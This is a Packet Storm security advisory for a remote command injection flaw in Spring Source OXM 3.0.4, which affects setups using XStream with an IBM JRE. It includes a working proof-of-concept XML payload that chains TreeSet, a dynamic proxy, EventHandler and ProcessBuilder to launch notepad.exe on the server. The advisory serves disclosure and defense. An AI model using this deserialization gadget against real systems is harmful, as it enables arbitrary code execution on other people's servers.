Spring Source OXM 3.0.4 Command Injection

2011-07-03T00:00:00
ID PACKETSTORM:102782
Type packetstorm
Reporter Pierre Ernst
Modified 2011-07-03T00:00:00

Description

                                        
                                            `Reference: http://static.springsource.org/spring/docs/3.0.x/spring-framework-reference/html/oxm.html#d0e26722  
Product: Spring Source OXM (Object/XML Mapping)  
Vendor: VMware  
Vulnerable Version: 3.0.4 only when XStream and IBM JRE are used  
Status: Fixed  
Vendor Notification: 12 October 2010  
Vendor Fix: 20 October 2010  
Vulnerability Type: Remote OS Command Injection (CAPEC-88)  
Credit: Pierre Ernst, IBM Canada, Business Analytics  
  
CVSS: 7.6  
AccessVector: Network  
AccessComplexity: High  
Authentication: None  
Confidentiality Impact: Complete  
Integrity Impact: Complete  
Availability Impact: Complete   
  
Details:  
  
Consider a service accepting XML input to be unmarshalled as an instance of the Bicycle class.  
  
This is an example of legitimate input:  
  
<bicycle>  
<name>unicycle</name>  
<id>123</id>  
<nbrWheels>1</nbrWheels>  
<nbrRiders>1</nbrRiders>  
</bicycle>  
  
  
This malicious input will execute the notepad application on the server and open the C:\Windows\win.ini file  
  
<bicycle class="java.util.TreeSet">  
<no-comparator />  
<object />  
<dynamic-proxy>  
<interface>java.lang.Comparable</interface>  
<handler class="java.beans.EventHandler">  
<target class="java.lang.ProcessBuilder">  
<command>  
<string>notepad.exe</string>  
<string>c:\windows\win.ini</string>  
</command>  
</target>  
<action>start</action>  
</handler>  
</dynamic-proxy>  
</bicycle>  
`